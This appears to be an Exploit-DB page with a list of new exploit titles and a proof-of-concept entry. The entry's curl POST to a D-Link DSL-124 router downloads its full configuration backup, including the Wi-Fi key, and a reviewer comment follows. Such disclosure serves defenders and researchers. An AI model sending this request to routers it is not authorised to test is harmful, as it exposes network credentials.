
13 changes to exploits/shellcodes/ghdb

DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
Helmet Store Showroom v1.0 - SQL Injection
Human Resource Management System 1.0 - SQL Injection (unauthenticated)
Revenue Collection System v1.0 - Remote Code Execution (RCE)
WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
Outline V1.6.0 - Unquoted Service Path
Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)
Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow
Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
46 lines
No EOL
1.7 KiB
Text
# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
# Date: 2022-11-10
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.dlink.com
# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09
# Firmware Version: ME_1.00
# Tested on: Windows 11

# [ Details - DSL-124 ]:
#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,
#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,
#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,
#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.

# [ Description ]:
#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,
#and in response to sending this request, she receives a complete backup of the router settings,
#In fact this happens because of the lack of management of users and sessions in the network.

# [ POC ]:

Request :

curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi

Response :

HTTP/1.1 200 OK
Connection: close
Server: Virtual Web 0.9
Content-Type: application/octet-stream;
Content-Disposition: attachment;filename="config.img"
Pragma: no-cache
Cache-Control: no-cache

<Config_Information_File_8671>
<V N="WLAN_WPA_PSK" V="pass@12345"/>
<V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>
<V N="WLAN_WPA_REKEY_TIME" V=""/>
<V N="WLAN_ENABLE_1X" V="0x0"/>
<V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/>
<V N="WLAN_RS_IP" V="0.0.0.0"/>
.
.
.
</Config_Information_File_8671>
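
Review bot: The [ Description ] block says the backup is returned "After the administrator enters and a new session is created", but the curl line under [ POC ] carries no cookie or credential and the text never says which host sends it, so a reader cannot tell whether form2saveConf.cgi has no authentication check of its own or whether the router ties the admin session to something other than the requesting client. Please state the precondition in one sentence (who is logged in, from where, and what the request carries), since that decides what an owner of firmware ME_1.00 should do about it. Two smaller points: the sample response shows a literal WLAN_WPA_PSK value ("pass@12345"), which should be a placeholder if it came from a real device, and the header has no line for a CVE id or a fixed firmware version, so add them or say that none exists.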